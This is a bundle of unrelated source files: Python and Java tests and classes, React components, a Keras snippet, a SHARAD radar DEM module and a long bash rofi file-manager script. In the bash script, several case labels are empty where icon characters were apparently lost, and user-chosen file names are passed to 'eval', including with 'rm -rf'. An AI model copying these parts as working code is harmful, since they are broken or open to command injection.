class TestAuthenticationEmails(cases.TestCase):
"""Test cases for outbound emailing capabilities related to authentication.
"""
@mock.patch('app.notifications.email.Mailer.deliver')
def test_reset_password(self, mock_deliver):
"""It should call the Mailer.deliver method with the proper template.
"""
uid = '1'
email = '<EMAIL>'
token = '<PASSWORD>'
emails.reset_password(email, uid, token)
mock_deliver.assert_called_with(
email,
'Here\'s a link to reset your password',
{'email': email, 'token': token, 'uid': uid},
)
@mock.patch('app.notifications.email.Mailer.deliver')
def test_password_was_reset(self, mock_deliver):
"""It should call the Mailer.deliver method with the proper template.
"""
email = '<EMAIL>'
emails.password_was_reset(email)
mock_deliver.assert_called_with(
email,
'Your Metamapper password was changed',
{'to_address': email},
)
|
export default class Action {
constructor(name) { this.name = name.toUpperCase() };
list = (list) => ({ type: `LIST_${this.name}`, list });
relations = relationsData => ({ type: `RELATIONS_${this.name}`, relationsData });
deleteObj = (deleteId) => ({ type: `DELETE_${this.name}`, deleteId });
} |
/**
* @license
* Copyright 2016 Google Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
foam.CLASS({
package: 'foam.u2.stack',
name: 'StackView',
extends: 'foam.u2.View',
requires: [
'foam.u2.stack.Stack'
],
exports: [ 'data as stack' ],
properties: [
{
name: 'data',
factory: function() { return this.Stack.create(); }
},
{
class: 'Boolean',
name: 'showActions',
value: true
}
],
methods: [
// TODO: Why is this init() instead of initE()? Investigate and maybe fix.
function init() {
this.setNodeName('div');
this.addClass(this.myClass());
if ( this.showActions ) {
this.start('actions')
.add(this.data.cls_.getAxiomsByClass(foam.core.Action))
.end();
}
this.add(this.slot(function(s) {
if ( ! s ) return this.E('span');
var view = s[0];
var parent = s[1];
// Do a bit of a dance with the context, to ensure that exports from "parent"
// are available to "view"
var X = parent ? this.__subSubContext__.createSubContext(parent) : this.__subSubContext__;
return foam.u2.ViewSpec.createView(view, null, this, X);
}, this.data$.dot('top')));
}
]
});
|
<reponame>raulrozza/Gametask_Web
import { useFormikContext } from 'formik';
import React, { useCallback } from 'react';
import { FaPlus } from 'react-icons/fa';
import IRank from 'shared/domain/entities/IRank';
import { Container } from './styles';
interface AddItemButtonProps {
handlePush(rank: IRank): void;
}
interface IRankValues {
ranks: IRank[];
}
const AddItemButton: React.FC<AddItemButtonProps> = ({ handlePush }) => {
const formik = useFormikContext<IRankValues>();
const onClick = useCallback(() => {
const { ranks } = formik.values;
const level = ranks.length ? ranks[ranks.length - 1].level + 1 : 1;
handlePush({
level: level,
tag: '',
name: '',
color: '',
});
}, [formik.values, handlePush]);
return (
<Container type="button" onClick={onClick}>
<FaPlus />
</Container>
);
};
export default AddItemButton;
|
# Create the input shape
input_shape = (224, 224, 3)
# Create model
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(2, activation='sigmoid'))
# Compile the model
model.compile(loss='categorical_crossentropy',
optimizer='adam', metrics=['accuracy'])
# Add a mobilenet model on top for faster inference
base_model = MobileNet(input_shape=(224, 224, 3),
weights='imagenet',
include_top=False)
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(1024, activation='relu')(x)
base_model_output = Dense(2, activation='sigmoid',
name='predictions')(x)
model = Model(inputs=base_model.input, outputs=base_model_output)
model.compile(loss='categorical_crossentropy',
optimizer='adam', metrics=['accuracy']) |
<filename>api/src/main/java/io/mifos/identity/api/v1/domain/Permission.java
/*
* Copyright 2017 The Mifos Initiative.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.mifos.identity.api.v1.domain;
import io.mifos.anubis.api.v1.domain.AllowedOperation;
import org.hibernate.validator.constraints.NotBlank;
import javax.validation.Valid;
import javax.validation.constraints.NotNull;
import java.util.Objects;
import java.util.Set;
/**
* @author <NAME>
*/
@SuppressWarnings({"WeakerAccess", "unused"})
public class Permission {
@NotBlank
private String permittableEndpointGroupIdentifier;
@NotNull
@Valid
private Set<AllowedOperation> allowedOperations;
public Permission() {
}
public Permission(String permittableEndpointGroupIdentifier, Set<AllowedOperation> allowedOperations) {
this.permittableEndpointGroupIdentifier = permittableEndpointGroupIdentifier;
this.allowedOperations = allowedOperations;
}
public String getPermittableEndpointGroupIdentifier() {
return permittableEndpointGroupIdentifier;
}
public void setPermittableEndpointGroupIdentifier(String permittableEndpointGroupIdentifier) {
this.permittableEndpointGroupIdentifier = permittableEndpointGroupIdentifier;
}
public Set<AllowedOperation> getAllowedOperations() {
return allowedOperations;
}
public void setAllowedOperations(Set<AllowedOperation> allowedOperations) {
this.allowedOperations = allowedOperations;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
Permission that = (Permission) o;
return Objects.equals(permittableEndpointGroupIdentifier, that.permittableEndpointGroupIdentifier) &&
Objects.equals(allowedOperations, that.allowedOperations);
}
@Override
public int hashCode() {
return Objects.hash(permittableEndpointGroupIdentifier, allowedOperations);
}
@Override
public String toString() {
return "Permission{" +
"permittableEndpointGroupIdentifier='" + permittableEndpointGroupIdentifier + '\'' +
", allowedOperations=" + allowedOperations +
'}';
}
}
|
<reponame>cxq257990/sweet81
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package com.taobao.weex.ui.component;
import com.taobao.weappplus_sdk.BuildConfig;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.powermock.core.classloader.annotations.PowerMockIgnore;
import org.robolectric.RobolectricGradleTestRunner;
import org.robolectric.annotation.Config;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
/**
* Created by sospartan on 8/9/16.
*/
@RunWith(RobolectricGradleTestRunner.class)
@Config(constants = BuildConfig.class, sdk = 19)
@PowerMockIgnore( {"org.mockito.*", "org.robolectric.*", "android.*"})
public class TextareaTest {
Textarea component;
@Before
public void setUp() throws Exception {
component = EditComponentTest.createTextarea();
ComponentTest.create(component);
}
@Test
public void testSetProperty() throws Exception {
Map<String, Object> props = new HashMap<>();
int len = EditComponentTest.PROPS.length;
for (int i = 0; i < len; i++) {
for (Object obj : EditComponentTest.TEST_VALUES[i]) {
props.put(EditComponentTest.PROPS[i], obj);
component.updateProperties(props);
}
}
}
@After
public void tearDown() throws Exception {
ComponentTest.destory(component);
}
}
|
<filename>surfPow/nadir.py
from osgeo import gdal, osr
from gdalconst import *
import numpy as np
import sys
'''
set of functions and classes for finding nadir location of SHARAD radargrams.
authors: <NAME> & <NAME>
created: 30January2018
updated: 05APR19
'''
class Dem:
# Holds an array of DEM data and relevant metadata
def __init__(self,dem_path):
src_dem = gdal.Open(dem_path,GA_ReadOnly)
self.csys = src_dem.GetProjection()
self.gt = src_dem.GetGeoTransform()
self.nd = src_dem.GetRasterBand(1).GetNoDataValue()
if(self.nd == None):
self.nd = -np.finfo('d').max
self.data = np.array(src_dem.GetRasterBand(1).ReadAsArray())
src_dem = None
class Loc:
# A location in 3D space, either in cartesian or geodetic coordinates
# The two are switched between often in this program so they are just
# combined. X is the same field as longitude, Y is the same field as
# latitude, Z is the same field as the radius.
def __init__(self,x,y,z):
self.x = x
self.y = y
self.z = z
self.ol = False
self.nd = False
def __eq__(self, other):
if(other is None):
return False
else:
return(self.x == other.x and self.y == other.y and self.z == other.z)
def __ne__(self, other):
return(not self.__eq__(other))
def __str__(self):
return('(' + str(self.x) + ',' + str(self.y) + ',' + str(self.z) + ')')
def __add__(self,vec):
# Only allowed to add vectors to points
return Loc(self.x + vec.i, self.y + vec.j, self.z + vec.k)
def __radd__(self,vec):
return self.__add__(vec)
def __sub__(self,vec):
# Only allowed to subtract vectors from points
return Loc(self.x - vec.i, self.y - vec.j, self.z - vec.k)
def __rsub__(self,vec):
return self.__add__(vec)
def copy(self):
return Loc(self.x, self.y, self.z)
def topix(self,dem):
# This transforms a point to an (x,y) pixel location on a DEM using the input geotransform
# IF YOU USE THIS ON ITS OWN WITHOUT THE toground() FUNCTION
# FOR A Path MAKE SURE THAT THE POINT COORDINATES ARE IN THE
# SAME COORDINATE SYSTEM AS THE GEOTRANSFORM
gt = dem.gt
x = int((gt[0] - self.x)/-gt[1])
y = int((gt[3] - self.y)/-gt[5])
## Out of bounds stuff
#if(x >= dem.data.shape[1]):
# x = dem.data.shape[1] - 1
#if(y >= dem.data.shape[0]):
# y = dem.data.shape[0] - 1
#if(x < 0):
# x = 0
#if(y < 0):
# y = 0
## Other option for out of bounds stuff
if(x<0 or y <0 or x >= dem.data.shape[1] or y >= dem.data.shape[0]):
#print('Requested data off DEM warning',[x,y],[self.x,self.y,self.z])
#print(x,dem.data.shape[1],y,dem.data.shape[0])
return Loc(-1,-1,0)
out = Loc(x,y,0)
# SPECIFIC FOR MOLA
#if(y < 116 or y > 22412):
# out.ol = True
return out
def equals(self, other):
# Checks equality of two points
if(self.x == other.x and self.y == other.y and self.z == other.z):
return True
return False
class Path:
# A list of loc objects, representing a path. Along with some useful
# metadata
def __init__(self, csys = None, pts = []):
self.pts = pts
self.csys = csys
def __setitem__(self,i,item):
self.pts[i] = item
def __getitem__(self,i):
return self.pts[i]
def __len__(self):
return len(self.pts)
def append(self,Loc):
self.pts.append(Loc)
def copy(self):
# Returns a copy of the Pointlist
return Path(self.csys,self.pts[:])
def transform(self,targ):
#print(self)
# Transforms a Pointlist to another coordinate system, can read Proj4 format
# and WKT
pts = self.copy()
source = osr.SpatialReference()
target = osr.SpatialReference()
# Deciding whether the coordinate systems are Proj4 or WKT
sc0 = pts.csys[0]
if(sc0 == 'G' or sc0 == 'P'):
source.ImportFromWkt(pts.csys)
else:
source.ImportFromProj4(pts.csys)
tc0 = targ[0]
if(tc0 == 'G' or tc0 == 'P'):
target.ImportFromWkt(targ)
elif(tc0 == '+'):
target.ImportFromProj4(targ)
else:
print("Unrecognized target coordinate system:")
print(targ)
sys.exit()
# The actual transformation
transform = osr.CoordinateTransformation(source, target)
xform = transform.TransformPoint
#print(pts[1].z)
for i in range(len(pts)):
#print(pts[1].z)
#print(type(pts[i].x),type(pts[i].y),type(pts[i].z))
#print('orig',str(pts[i]))
npt = list(xform(pts[i].x,pts[i].y,pts[i].z))
pts[i] = Loc(npt[0],npt[1],npt[2])
#print('xform',str(pts[i]))
pts.csys = targ
return pts
def toground(self, dem, outsys = None):
# Function will get the points on the ground directly below a list of points,
# this is not destructive and returns a new list
grd = self.copy() # copy to store on-ground points
origsys = grd.csys
# Transforming to the DEM coordinate system so the geotransform math works
grd = grd.transform(dem.csys)
# Iterate through the points and get the points below them
for i in range(len(grd)):
zpix = grd[i].topix(dem)
if(zpix.x == -1 and zpix.y == -1):
grd[i].z = dem.nd
else:
grd[i].z = float(dem.data[zpix.y][zpix.x])
# Set coordinate systems for the new lists
if(not(outsys is None)):
grd = grd.transform(outsys)
else:
grd = grd.transform(origsys)
return grd
#### NAV IMPORT ####
def GetNav_geom(navfile):
f = open(navfile,'r')
navdat_raw = f.read()
f.close()
navdat_raw = navdat_raw.split('\n')
del navdat_raw[0]
del navdat_raw[-1]
navdat_raw = filter(None,navdat_raw)
navdat = Path()
for i in navdat_raw:
if(len(i) > 0):
i = i.split(',')
navdat.append(Loc(float(i[2])*1000,float(i[3])*1000,float(i[4])*1000)) # x,y,z position vectors (converted to meters)
# Transform x,y,z position vectors from 3D cartesian to geographic coords
geocsys = '+proj=longlat +a=3396000 +b=3396000 +no_defs'
navdat.csys = '+proj=geocent +a=3396000 +b=3396000 +no_defs'
navdat = navdat.transform(geocsys) # spheroid referenced lat, long, rad [m]
return navdat |
<filename>client/src/components/startup/registration/TermsScreen.js
// @flow
import React from 'react';
import { Alert, AsyncStorage, Button, Dimensions, StyleSheet, Text, View } from 'react-native';
import { ButtonBox } from '../../design/ButtonBox';
import { GS } from '../../style';
import { D, i18n } from '../../../i18n/index';
import { TERMS_OF_SERVICE } from '../../../resources/terms_of_service';
import { PRIVACY_POLICY } from '../../../resources/privacy_policy';
import { KEY_AGREED_TERMS } from '../../../models/global_storage_keys';
import { DefaultScrollView } from '../../design/DefaultScrollView';
import type { Navigator } from '../../../types';
type Props = {|
back?: () => void,
next?: () => void,
navigation?: Navigator<*>,
showAlert?: boolean,
|};
export class TermsScreen extends React.PureComponent {
props: Props;
state = { scrolledToBottom: false };
componentDidMount() {
if (this.props.showAlert) {
Alert.alert(i18n(D().startup.registration.terms.alertTitle), i18n(D().startup.registration.terms.alertBody), [], {
cancelable: false,
});
}
}
async onPressNext() {
await AsyncStorage.setItem(KEY_AGREED_TERMS, JSON.stringify(true));
if (this.props.next) {
this.props.next();
}
}
handleScroll(event: Object) {
const windowHeight = Dimensions.get('window').height;
const height = event.nativeEvent.contentSize.height;
const offset = event.nativeEvent.contentOffset.y;
if (windowHeight + offset >= height) {
this.setState({ scrolledToBottom: true });
}
}
renderButtons() {
return (
<ButtonBox direction="horizontal">
{this.props.back ? <Button title={i18n(D().common.back)} onPress={this.props.back} /> : []}
{this.props.next ? (
<Button
title={i18n(D().startup.registration.terms.agree)}
onPress={() => this.onPressNext()}
disabled={!this.state.scrolledToBottom}
/>
) : (
[]
)}
</ButtonBox>
);
}
render() {
return (
<View style={GS.flex}>
<DefaultScrollView style={[GS.flex, GS.padding10]} onScroll={event => this.handleScroll(event)}>
<View style={S.block}>
<Text style={S.title}>利用規約</Text>
<Text style={S.body}>{TERMS_OF_SERVICE}</Text>
</View>
<View style={S.block}>
<Text style={S.title}>プライバシーポリシー</Text>
<Text style={S.body}>{PRIVACY_POLICY}</Text>
</View>
</DefaultScrollView>
{this.renderButtons()}
</View>
);
}
}
const S = StyleSheet.create({
block: {
margin: 5,
marginBottom: 50,
},
title: {
fontSize: 26,
marginBottom: 5,
},
body: {
fontSize: 14,
lineHeight: 20,
},
});
|
#!/bin/bash
function set() {
eval $1='${2:-${!1}}'
escaped=$(sed 's/[\/\&]/\\&/g' <<< "${!1}")
sed -i "s/\(^$1=\).*/\1\"$escaped\"/" $0
}
set_multiple_files() {
if [[ ${multiple_files:-$archive_multiple} ]]; then
[[ $option == extract_archive ]] && local var=archive_multiple || var=multiple_files
[[ "${!var}" =~ | ]] && files="'$1'{'${!var//|/\',\'}'}" || files="'$1''${!var}'"
[[ ! $option =~ yes|playlist ]] && end='\n\n'
multiple_files_notification="$start\n${!var//|/\\n}$end"
un_set $var
fi
}
function un_set() {
for var in "$@"; do
unset $var
set $var
done
}
function back() {
current="${current%/*}"
set current "${current:-/}"
}
function print_options() {
for option in ${!options[*]}; do
echo -e "${options[option]}"
done
}
function create_archive() {
filename="$current/$arg"
cd ${source_dir:-$archive}
set_multiple_files
notify "Adding\n<b>${multiple_files_notification:-${archive##*/}}</b> to <b>${filename##*/}</b>"
shopt -s extglob
case ${filename##*.} in
*[bgx]z*) coproc (eval tar zcf "$filename" "${regex:-${files:-${content:-"${archive##*/}"}}}" &);;
zip) coproc (eval zip -rqq9 "$filename" "${regex:-${files:-${content:-"${archive##*/}"}}}" &);;
rar) coproc (eval rar a "$filename" "${regex:-${files:-${content:-${archive##*/}}}}"-inul &);;
esac
un_set regex
pid=$((COPROC_PID + 1))
coproc (execute_on_finish "notify 'Operation finished.'" &)
echo -e
un_set archive
}
function list_archive() {
format=${current##*.}
case $format in
*[bgx]z*) tar tf "$current" | awk '{ if("'$selection'") s = (/^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/) ? " " : " "
print s $0 }';;
zip) nr=2 flag=-l;;
rar) nr=7 flag=l;;
esac
[[ $format =~ zip|rar ]] && un$format $flag $password "$current" | awk 'NR == '$nr' { i = index($0, "Name") } \
/[0-9]{4}-[0-9]{2}-[0-9]{2}/ {
f = substr($0, i)
if("'$selection'") s = (f ~ /^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/) ? " " : " "
print s f
}'
}
function extract_archive() {
format=${archive##*.}
destination="$current"
[[ $arg ]] && destination+="/$arg"
if [[ ${regex:-$archive_single} ]]; then
case $format in
*[bgx]z*)
[[ $regex ]] && var=regex || var=archive_single
path_levels=${!var//[^\/]/}
level_count=${#path_levels}
[[ $archive_single =~ /$ ]] && ((level_count--))
strip="--strip=$level_count";;
zip) [[ $archive_single =~ /$ ]] || flag=j;;
rar) [[ $(unrar l "$archive" | sed -n "/\s${archive_single//\//\\\/}$/ s/.*\.\([AD]\)\..*/\1/p") == D ]] && flag=x || flag=e
esac
fi
notify "Extracting\n<b>${archive%/*}/${archive_single:-${archive##*/}}</b> to <b>$destination</b>"
[[ $archive_multiple ]] && archive_multiple="$(sed 's/\(^\||\)[^|]*\/|/\1/g' <<< $archive_multiple)"
set_multiple_files
case $format in
*[bgx]z*) coproc (eval tar xfC "$archive" "$destination" "${regex:-${files:-$archive_single}}" $strip &);;
zip) coproc (eval unzip -qq$flag $password \"$archive\" "${regex:-${files:-$archive_single\"*\"}}" -d \"$destination\" &);;
rar) coproc (eval unrar ${flag:-x} $password \"$archive\" \"${regex:-${files:-${archive_single:-*}}}\" \"$destination\" -inul &);;
esac
un_set regex
pid=$((COPROC_PID + 1))
coproc (execute_on_finish "notify 'Operation finished.'" &)
echo -e
un_set archive archive_single password
}
check_git_files() {
aggregate_files() {
local field=$1
awk -F '['\''/]' '{ if(o !~ "\\|"$'$1'"($|\\|)") o = o "|" $'$1' } END { print substr(o, 2) }'
}
git="$current"
sub_dir=$(git rev-parse --show-prefix)
sub_depth=$(wc -L <<< ${sub_dir//[^\/]/})
staged=$(git diff --cached --name-only . | aggregate_files $((1 + sub_depth)))
unstaged=$(git add . -n | aggregate_files $((2 + sub_depth)))
set staged
set unstaged
}
function add_music() {
[[ ${current#$music_directory} ]] && music_files_directory="${current#$music_directory/}/"
set_multiple_files "$music_files_directory"
notify "Adding to playlist\n<b>${multiple_files_notification:-${current##*/}}</b>"
eval mpc add "${files:-'${current#$music_directory/}'}" &
}
function notify() {
~/.orw/scripts/notify.sh -p "$1"
}
execute_on_finish() {
while kill -0 $pid 2> /dev/null; do
sleep 1
done && eval "$@"
}
[[ ${@%% *} == *[![:ascii:]]* && ${@#${@%% *}} ]] && file="${@#* }" || read option arg <<< "$@"
all=""
move=""
copy=""
sort=""
reverse=""
options=""
current="/home/sola"
torrent=""
selection=""
multiple_files=""
music_directory="/home/sola/Music"
regex=""
git=""
staged=""
unstaged=""
list=""
archive=""
password=""
archive_single=""
archive_multiple=""
bookmarks=${0%/*}/bookmarks
[[ $options ]] && back_icon= || back_icon=
back_icon=
echo -e $back_icon
#~/.orw/scripts/notify.sh "o: $back_icon $options"
if [[ -z $@ ]]; then
set current "$HOME"
elif [[ $file ]]; then
toggle_file() {
if [[ "${!1}" =~ \|"$file"$ ]]; then local toggle_file="|$file"
elif [[ "${!1}" == "$file" ]]; then local toggle_file="$file"
else local toggle_file="$file|"; fi
eval "$1=\${$1//"$toggle_file"}"
set $1
}
if [[ $git ]]; then
cd "$current"
if [[ "$unstaged" =~ (^|\|)"$file"(\||$) ]]; then
toggle_file unstaged
((${#staged})) && staged+="|$file" || staged="$file"
set staged
git add -A "$file"
else
toggle_file staged
((${#unstaged})) && unstaged+="|$file" || unstaged="$file"
set unstaged
commit_count=$(git rev-list --all --count)
((commit_count)) && command='restore --staged' || command='rm --cached'
git $command "$file" --quiet
fi
else
if [[ $selection ]]; then
[[ ${file: -1} == / ]] &&
file=$(list_archive | awk '/ '${file//\//\\/}'/ { sub("^[^ ]* ", "|"); f = f $0 } END { print substr(f, 2) }')
if [[ "$multiple_files" =~ "$file" ]]; then
toggle_file multiple_files
else
((${#multiple_files})) && multiple_files+="|$file" || multiple_files="$file"
fi
set multiple_files
else
set current "$current/$file"
fi
fi
fi
if [[ ${option% *} ]]; then
[[ $selection && $option =~ ^[a-z] && ! $option =~ selection|_all$ ]] && un_set selection
case "$option" in
$back_icon)
if [[ $options ]]; then
[[ $options =~ ^options|bookmarks || $list ]] && un_set options || set options options
elif [[ "$archive" && -f "$current" && "$archive" == "$current" ]]; then
if [[ $list ]]; then
un_set list
if [[ $multiple_files ]]; then
set archive_multiple "$multiple_files"
un_set selection multiple_files
fi
else
un_set list archive password
fi
else
back
fi;;
sort)
set options sub_options
echo -e 'by_date\nby_size\nby_type\nreverse\nalphabetically';;
git)
set options sub_options
echo -e 'show\nhide';;
remove)
set options sub_options
echo -e 'yes\nno';;
selection)
set options sub_options
echo -e 'enable\ndisable\nselect_all\ndiscard_all';;
hidden) [[ $hidden ]] && un_set hidden || set hidden '-a';;
password) [[ ${current##*.} == zip ]] && set password "-P ${@#* }" || set password "-p${@#* }";;
list_archive)
set list true
set archive "$current"
echo 'selection'
echo '━━━━━━━━━'
list_archive;;
slide_images)
killall rofi
feh "$current";;
mount)
lsblk -lpo +model | awk '{
if($1 ~ /sd.$/ && $7) {
m=""
for(f = 7; f <= NF; f++) m = m $f " "
}
if($6 == "part" && $4 ~ /[0-9]G/ && $7 !~ /^\//) printf("%-45s %-20s %s\n", m, $4, $1)}'
exit;;
edit_text)
killall rofi
set_multiple_files "$current/"
termite -e "bash -c \"nvim -p ${files:-${regex:-'$current'}}\"" &
un_set regex;;
open_in_terminal)
killall rofi
termite -e "bash -c \"cd '$current'\";bash"
exit;;
) set options options;;
);;
);;
);;
)
awk '{ print $1 }' $bookmarks
set options bookmarks;;
)
killall rofi
if [[ ! $file ]]; then
set_multiple_files "$current/"
un_set selection
if [[ $files ]]; then
#thunar &
#sleep 0.1
#for directory in $(eval echo $files); do
# ((tab)) && xdotool key ctrl+t
# xdotool key ctrl+l
# xdotool type -delay 0 "$directory"
# xdotool key Return
# ((tab++))
#done
~/.orw/scripts/vifm.sh -i "$files"
exit
else
~/.orw/scripts/vifm.sh -i "$current"
fi
fi;;
xdg-open)
killall rofi
[[ $(file --mime-type -b "$current") =~ "image" ]] && ~/.orw/scripts/open_multiple_images.sh "$current" ||
xdg-open "$current"
un_set options;;
view_all_images)
killall rofi
set_multiple_files "$current/"
~/.orw/scripts/sxiv_wrapper.sh "${files:-${regex:-'$current'/*}}"
un_set options regex
exit;;
*)
back=true
[[ $options =~ options ]] && un_set options
case $option in
show)
cd "$current"
check_git_files
set git;;
hide)
set current "$git"
un_set git un{staged,};;
commit)
cd $git
git commit -m "${arg//\"/}" --quiet
check_git_files;;
all) [[ $all ]] && un_set all || set all '-a';;
yes)
set_multiple_files "$current/"
notify "Removing\n<b>${multiple_files_notification:-${current##*/}}</b>"
if [[ $regex || $files ]]; then
unset back
else
[[ -d $current ]] && current_directory=${current%/*}
fi
eval rm -rf "${files:-${regex:-'$current'}}" &
un_set regex
[[ $current_directory ]] && set current $current_directory;;
no) ;;
move) set move "$current";;
copy) set copy "$current";;
paste)
destination="$current"
[[ $arg ]] && destination+="/$arg"
file="${move:-$copy}"
set_multiple_files "$file/"
if [[ $move ]]; then
operation=Move
command='mv'
un_set move
else
operation=Copy
command='cp -r'
fi
coproc (eval $command "${files:-${regex:-'$file'}}" "'$destination'" &)
un_set regex
pid=$((COPROC_PID + 1))
coproc (execute_on_finish "notify 'Operation finished.'" &)
echo -e ;;
add_to_bookmarks) echo "${arg:-${current##*/}} $current" >> $bookmarks;;
by_*|reverse|alpha*)
case ${option#*_} in
size) sort='-S';;
date) sort='-t';;
type) sort='-X';;
reverse) [[ $reverse ]] && un_set reverse || set reverse '-r';;
*) sort='';;
esac
set sort "$sort"
set options options;;
select_all)
unset selection
[[ $list ]] && command='list_archive' || command='ls -1 "$current"'
set multiple_files "$(eval $command | tr '\n' '|' | head -c -1)"
set selection "enabled";;
discard_all) un_set multiple_files;;
enable) set selection "enabled";;
disable)
un_set selection multiple_files archive_multiple
if [[ $list ]]; then
echo 'selection'
echo '━━━━━━━━━'
list_archive
unset back
fi;;
*torrent*)
[[ -d $current ]] && torrent_directory="$current" || set torrent "$current"
[[ $option =~ ^(add_torrent|select_torrent_content)$ ]] && torrent_state="--start-paused"
if [[ ! $option =~ destination ]]; then
pidof transmission-daemon &> /dev/null || coproc (transmission-daemon &)
command="transmission-remote -a ${regex:-\"$torrent\"} "
command+="-w '${torrent_directory-$HOME/Downloads/}' $torrent_state &> /dev/null"
coproc (execute_on_finish "sleep 0.5 && $command" &)
notify "Adding torrent\n${torrent:-$current}"
un_set regex torrent
fi
if [[ $option == select_torrent_content ]]; then
killall rofi
command="~/.orw/scripts/rofi_scripts/select_torrent_content_with_size.sh set_torrent_id"
command+="&& ~/.orw/scripts/rofi_scripts/torrents_group.sh select_torrent_content"
coproc (execute_on_finish "sleep 0.5 && $command" &)
exit
fi;;
extract_archive) [[ -d "$current" && $archive ]] && $option || set archive "$current";;
*to_archive)
if [[ -d "$current" && $archive ]]; then
[[ $option =~ directory ]] && source_dir="${archive%/*}" || content='{.,}[[:alnum:]]*'
create_archive
else
[[ -d $current ]] && archive="$current" || archive="${current%/*}"
set archive
fi;;
create_directory)
set current "$current/$arg"
mkdir "$current";;
add_to_playlist) add_music;;
*_wallpaper_directory)
[[ ! $option =~ ^set ]] &&
flag=M modify=${option%%_*}
#if [[ $option =~ ^set ]]; then
# flag=d
#else
# flag=M
# modify=${option%%_*}
#fi
set_multiple_files "$current/"
[[ $files ]] && files="${files//\'/}"
~/.orw/scripts/wallctl.sh -${flag:-d} $modify "${files:-$current}";;
set_as_wallpaper)
set_multiple_files "$current/"
eval ~/.orw/scripts/wallctl.sh -s "${files:-'$current'}";;
*)
if [[ $options == bookmarks ]]; then
current=$(awk '/^'$option' / { print gensub("^\\w* ", "", 1) }' $bookmarks)
un_set options
set current
else
if [[ "${@##* }" =~ ^/dev/sd.[0-9] ]]; then
~/.orw/scripts/mount.sh "${@##* }" "${@%% *}" "$current"
elif [[ $archive ]]; then
[[ $(list_archive | grep "^$@$") ]] &&
set archive_single "$@" || set regex "--wildcards $@"
un_set list
else
set regex "'$current'/$@"
set options options
unset back
fi
fi
esac
esac
fi
if [[ $list && $selection && ! $options ]]; then
echo 'selection'
echo '━━━━━━━━━'
list_archive
fi
if [[ $options == options ]]; then
options=( 'all' 'sort' 'copy' 'move' )
[[ $move || $copy ]] && options+=( 'paste' )
options+=( 'remove' 'mount' 'selection' 'add_to_bookmarks' 'add_content_to_archive' 'add_directory_to_archive' )
[[ "$archive" || "$archive_multiple" ]] && options+=( 'extract_archive' )
[[ "$torrent" ]] && options+=( 'add_torrent' 'start_torrent' 'select_torrent_content' )
[[ $multiple_files ]] && options+=( 'set_as_wallpaper' 'edit_text' )
[[ ! $music_directory ]] && set music_directory "$(sed -n 's/^music_directory.*\"\(.*\)\/\?\"/\1/p' ~/.mpd/mpd.conf)"
[[ "$current" =~ "$music_directory" ]] && options+=( 'add_to_playlist' )
options+=( 'set_as_wallpaper_directory' 'add_wallpaper_directory' 'remove_wallpaper_directory' 'view_all_images' 'open_in_terminal' )
options+=( 'create_directory' )
cd "$current"
repo=$(git status -sb | wc -l)
[[ $git ]] && options+=( 'commit' )
[[ $git ]] || ((repo)) && options+=( 'git' )
fi
if [[ ! -d "$current" && ! $selection && ! $git ]]; then
if [[ $back == true ]]; then
back
else
if [[ ! $list && ! $option == remove && ! $git ]]; then
options+=( 'move' 'copy' 'remove' 'xdg-open' )
mime=$(file --mime-type -b "$current")
case $mime in
*torrent)
options+=( 'add_torrent' 'start_torrent' 'select_torrent_destination' 'select_torrent_content' );;
*tar|*[bgx]z|*zip*|*rar) options+=( 'password' 'list_archive' 'extract_archive' );;
*image*) options+=( 'set_as_wallpaper' );;
*audio*) options+=( 'add_to_playlist' );;
*text*) options+=( 'edit_text' );;
esac
fi
fi
fi
if ((${#options[*]} > 1)); then
print_options | awk '!options[$0]++'
else
[[ ! -f "$current" && ! -d "$current" ]] && back
fi
if [[ -d "$current" && ! $options ]]; then
echo -e
echo -e
echo -e
if [[ $git ]]; then
print_git_files() {
[[ $1 =~ ^un ]] && local icon= || local icon=
for file in ${!1//|/ }; do
[[ $1 == staged && "$unstaged" =~ (^|\|)"$file"(\||$) ]] || echo $icon $file
done
}
print_git_files staged
print_git_files unstaged
else
while read -r s file; do
if [[ $file ]]; then
if [[ $selection ]]; then
((s)) && icon= || icon=
else
if [[ -d "$current/$file" ]]; then
icon=
else
#icon=
icon=
fi
fi
echo -e "$icon $file"
fi
done <<< "$(ls $sort $reverse $all --group-directories-first "$current" | awk '!/\.$/ \
{ print (length("'$selection'") && /^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/), $0 }')"
fi
fi
|
#!/bin/bash
